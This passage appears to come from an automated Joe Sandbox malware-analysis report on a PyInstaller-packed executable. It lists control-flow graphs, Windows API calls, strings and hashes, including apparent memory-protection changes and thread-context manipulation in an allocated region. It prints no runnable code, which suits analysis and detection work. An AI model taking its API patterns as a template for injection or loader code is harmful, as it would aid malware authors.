                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF72727E3BA,?,?,-00000018,00007FF72727A063,?,?,?,00007FF727279F5A,?,?,?,00007FF72727524E), ref: 00007FF72727E1A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                    • Instruction ID: 7da334ba5bba086bc4c6ff43416cfaecc0bc0d0357efc74eba6e71485b97bda3
                                                                    • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                    • Instruction Fuzzy Hash: C541D231F1960281EA15AB16AF00675A3E2FF46BA0F885135DD1D9F784EF3DE8068B30

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF727263834), ref: 00007FF727267CE4
                                                                    • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF727263834), ref: 00007FF727267D2C
                                                                      • Part of subcall function 00007FF727267E10: GetEnvironmentVariableW.KERNEL32(00007FF72726365F), ref: 00007FF727267E47
                                                                      • Part of subcall function 00007FF727267E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF727267E69
                                                                      • Part of subcall function 00007FF727277548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727277561
                                                                      • Part of subcall function 00007FF7272626C0: MessageBoxW.USER32 ref: 00007FF727262736
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                    • API String ID: 740614611-1339014028
                                                                    • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                    • Instruction ID: c97ddbcc912866e8b1daa67dba66fcef09995d615ad46b29a3cfb1c1ee7c6974
                                                                    • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                    • Instruction Fuzzy Hash: 90417011A0965340EA20BF61AF512F9E2F1EF4B780FD0903ADE0D47796EF3CE5068A60

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 714 7ff72727ad6c-7ff72727ad92 715 7ff72727adad-7ff72727adb1 714->715 716 7ff72727ad94-7ff72727ada8 call 7ff7272743d4 call 7ff7272743f4 714->716 718 7ff72727b187-7ff72727b193 call 7ff7272743d4 call 7ff7272743f4 715->718 719 7ff72727adb7-7ff72727adbe 715->719 734 7ff72727b19e 716->734 736 7ff72727b199 call 7ff727279bf0 718->736 719->718 721 7ff72727adc4-7ff72727adf2 719->721 721->718 725 7ff72727adf8-7ff72727adff 721->725 726 7ff72727ae18-7ff72727ae1b 725->726 727 7ff72727ae01-7ff72727ae13 call 7ff7272743d4 call 7ff7272743f4 725->727 732 7ff72727b183-7ff72727b185 726->732 733 7ff72727ae21-7ff72727ae27 726->733 727->736 737 7ff72727b1a1-7ff72727b1b8 732->737 733->732 738 7ff72727ae2d-7ff72727ae30 733->738 734->737 736->734 738->727 741 7ff72727ae32-7ff72727ae57 738->741 743 7ff72727ae8a-7ff72727ae91 741->743 744 7ff72727ae59-7ff72727ae5b 741->744 745 7ff72727ae66-7ff72727ae7d call 7ff7272743d4 call 7ff7272743f4 call 7ff727279bf0 743->745 746 7ff72727ae93-7ff72727aebb call 7ff72727c90c call 7ff727279c58 * 2 743->746 747 7ff72727ae5d-7ff72727ae64 744->747 748 7ff72727ae82-7ff72727ae88 744->748 775 7ff72727b010 745->775 777 7ff72727aebd-7ff72727aed3 call 7ff7272743f4 call 7ff7272743d4 746->777 778 7ff72727aed8-7ff72727af03 call 7ff72727b594 746->778 747->745 747->748 749 7ff72727af08-7ff72727af1f 748->749 752 7ff72727af9a-7ff72727afa4 call 7ff727282c2c 749->752 753 7ff72727af21-7ff72727af29 749->753 764 7ff72727b02e 752->764 765 7ff72727afaa-7ff72727afbf 752->765 753->752 756 7ff72727af2b-7ff72727af2d 753->756 756->752 760 7ff72727af2f-7ff72727af45 756->760 760->752 767 7ff72727af47-7ff72727af53 760->767 773 7ff72727b033-7ff72727b053 ReadFile 764->773 765->764 769 7ff72727afc1-7ff72727afd3 GetConsoleMode 765->769 767->752 771 7ff72727af55-7ff72727af57 767->771 769->764 774 7ff72727afd5-7ff72727afdd 769->774 771->752 776 7ff72727af59-7ff72727af71 771->776 779 7ff72727b14d-7ff72727b156 GetLastError 773->779 780 7ff72727b059-7ff72727b061 773->780 774->773 782 7ff72727afdf-7ff72727b001 ReadConsoleW 774->782 785 7ff72727b013-7ff72727b01d call 7ff727279c58 775->785 776->752 786 7ff72727af73-7ff72727af7f 776->786 777->775 778->749 783 7ff72727b158-7ff72727b16e call 7ff7272743f4 call 7ff7272743d4 779->783 784 7ff72727b173-7ff72727b176 779->784 780->779 788 7ff72727b067 780->788 791 7ff72727b003 GetLastError 782->791 792 7ff72727b022-7ff72727b02c 782->792 783->775 796 7ff72727b17c-7ff72727b17e 784->796 797 7ff72727b009-7ff72727b00b call 7ff727274368 784->797 785->737 786->752 795 7ff72727af81-7ff72727af83 786->795 789 7ff72727b06e-7ff72727b083 788->789 789->785 799 7ff72727b085-7ff72727b090 789->799 791->797 792->789 795->752 803 7ff72727af85-7ff72727af95 795->803 796->785 797->775 805 7ff72727b0b7-7ff72727b0bf 799->805 806 7ff72727b092-7ff72727b0ab call 7ff72727a984 799->806 803->752 810 7ff72727b13b-7ff72727b148 call 7ff72727a7c4 805->810 811 7ff72727b0c1-7ff72727b0d3 805->811 814 7ff72727b0b0-7ff72727b0b2 806->814 810->814 815 7ff72727b12e-7ff72727b136 811->815 816 7ff72727b0d5 811->816 814->785 815->785 818 7ff72727b0da-7ff72727b0e1 816->818 819 7ff72727b11d-7ff72727b128 818->819 820 7ff72727b0e3-7ff72727b0e7 818->820 819->815 821 7ff72727b0e9-7ff72727b0f0 820->821 822 7ff72727b103 820->822 821->822 823 7ff72727b0f2-7ff72727b0f6 821->823 824 7ff72727b109-7ff72727b119 822->824 823->822 825 7ff72727b0f8-7ff72727b101 823->825 824->818 826 7ff72727b11b 824->826 825->824 826->815
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 3215553584-0
                                                                    • Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                                    • Instruction ID: b3d88e94df5d09ebe88b2d2feb531343c9b4f773837421e253f4a9210b3a7def
                                                                    • Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                                    • Instruction Fuzzy Hash: 7BC1E422A0C68751EB60AB199F006BEB7F1FB92B90F950131D94D0B791DF7DE8478B20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                    • String ID:
                                                                    • API String ID: 995526605-0
                                                                    • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                    • Instruction ID: 1f0d4db64090d6647250bc56dac21d88acc5c612581f9e0b8a327322c82439a6
                                                                    • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                    • Instruction Fuzzy Hash: 9F217521A0CA4341EB10AF65BA40629F3F1EF967B4F904239D66D43BE4DF7DD4468B20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF727263534), ref: 00007FF727263411
                                                                      • Part of subcall function 00007FF7272629E0: GetLastError.KERNEL32(?,?,?,00007FF72726342E,?,00007FF727263534), ref: 00007FF727262A14
                                                                      • Part of subcall function 00007FF7272629E0: FormatMessageW.KERNEL32(?,?,?,00007FF72726342E), ref: 00007FF727262A7D
                                                                      • Part of subcall function 00007FF7272629E0: MessageBoxW.USER32 ref: 00007FF727262ACF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ErrorFileFormatLastModuleName
                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                    • API String ID: 517058245-2863816727
                                                                    • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                    • Instruction ID: d7540c74f90f928b100fd777b72ef7bac2ba2ac41561a2ede2a52ac87d0a382f
                                                                    • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                    • Instruction Fuzzy Hash: 13215E61B0954291FA21B724EE513BAD2F0EF4A394FC0913BD56D865D6EF2CE1068B30

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: ae626e2526dc2842cb9680c78fe3cfcacc565d99c999a4cd0fac7440625693f4
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: 73112E3570AB4386EF14AF15E4443AA62A2F784BA5F480435DE8907764EF3DC516C704
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction ID: d6580e7e2655b24bfbb5bfe650b0e2b3c7c5f3627d680ca0a9825be828d7b117
                                                                    • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                    • Instruction Fuzzy Hash: 4ED1AD36209F4A81DA71AF0AE4943AE77A1F788BD4F150176EA8D47BA5DF3CC551CB00
                                                                    APIs
                                                                      • Part of subcall function 00007FF727267B50: GetCurrentProcess.KERNEL32 ref: 00007FF727267B70
                                                                      • Part of subcall function 00007FF727267B50: OpenProcessToken.ADVAPI32 ref: 00007FF727267B83
                                                                      • Part of subcall function 00007FF727267B50: GetTokenInformation.KERNELBASE ref: 00007FF727267BA8
                                                                      • Part of subcall function 00007FF727267B50: GetLastError.KERNEL32 ref: 00007FF727267BB2
                                                                      • Part of subcall function 00007FF727267B50: GetTokenInformation.KERNELBASE ref: 00007FF727267BF2
                                                                      • Part of subcall function 00007FF727267B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF727267C0E
                                                                      • Part of subcall function 00007FF727267B50: CloseHandle.KERNEL32 ref: 00007FF727267C26
                                                                    • LocalFree.KERNEL32(?,00007FF727263814), ref: 00007FF72726848C
                                                                    • LocalFree.KERNEL32(?,00007FF727263814), ref: 00007FF727268495
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                    • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                    • API String ID: 6828938-1529539262
                                                                    • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                    • Instruction ID: f706e5ae5ff49b32c817ffc02753c65bdc1cf30935e474e9f2db6dc9505d47d7
                                                                    • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                                    • Instruction Fuzzy Hash: 88213021A0864281F610BB11EE153EAA2F1FF8A780FD4803AEA4D57796DF3DD5468B60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                    • String ID: \\?\
                                                                    • API String ID: 2719912262-4282027825
                                                                    • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction ID: bad3983c209706a862f985ca5347f50916ceb6da670f5fd2ef7754fd0d59a958
                                                                    • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                    • Instruction Fuzzy Hash: 4BF0317270DA8392F760AF21E9947AA6762F748BE8F884030DA4946564DE7CC65ECB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction ID: 4ceb33a64c3d040630e9184daae9a524691a7227a813c734a7b93e729410ee41
                                                                    • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                    • Instruction Fuzzy Hash: 8B02C93221EB8686EB60DF55E4903AEB7A1F3C4790F151075EA8E87BA8DB7CC555CB00
                                                                    APIs
                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72727C25B), ref: 00007FF72727C38C
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72727C25B), ref: 00007FF72727C417
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                    • Instruction ID: 49331cfd8f6c822c206d33c88c8e12988b968b844c2899651d9cff5fb1cbb5c4
                                                                    • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                    • Instruction Fuzzy Hash: 46910622E0965185F710AF759F5027DA7F5FB02B88F941139CE0E6AA84CF38D4838B20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 1279662727-0
                                                                    • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                    • Instruction ID: 11f2d6986d0de873f9c71a8d362d6a1893df524febc0c04c537d969a13828c78
                                                                    • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                                    • Instruction Fuzzy Hash: 5641B822D1878183F714AB219B10379B2B0FB96764F509334D65C0BAD5EF7CA1E18B20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 3251591375-0
                                                                    • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                    • Instruction ID: 0bb224ed14390f0cd164adf129a11f3dd125c7dafd874715d2e98d2d0fe9dbb0
                                                                    • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                    • Instruction Fuzzy Hash: 4731FB11A0A14241FA54BB649F523B992E1DF47384FC4A03AE90D4B6D7DF2DB8878E31
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocQuery
                                                                    • String ID:
                                                                    • API String ID: 31662377-0
                                                                    • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction ID: 8494eed6f30f04f64a204bc8be07fa62cc72b7ebeb54313b3d002bd1a31d79cc
                                                                    • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                    • Instruction Fuzzy Hash: 9D31433221FA8785FB31AE15E0813AE66A2F3887E4F140575F5CD06BA8DF7DC5628B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 8995d56428e761bb532f8bb1f4f59946e230cd47d8b45a073a85f93f88cd4606
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: AE11653062E64389FB60BF21F9853FE1296A7547B4F5C41749A46865A1EF78C57A8200
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 3733156554-0
                                                                    • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction ID: 44ff97e0b351837d50cb721b9a71f71668a221f9f7f561b8c2f96628a5abc8a7
                                                                    • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                    • Instruction Fuzzy Hash: 4AF0123521DA06C0D631AF05E4403AE6BA1F3887E4F181171BA8D03B69CB38C6A28B00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                    • Instruction ID: 8d34cda919779dcf83414300c23769cd4bf1141f1de5a960ac73c11f89d4341b
                                                                    • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                                    • Instruction Fuzzy Hash: CDD06720B1860687EA543B715F9A17992B19F9A751F94143CD84A4A3A7CF3DA80A4B70
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AllocLibraryLoadVirtual
                                                                    • String ID:
                                                                    • API String ID: 3550616410-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
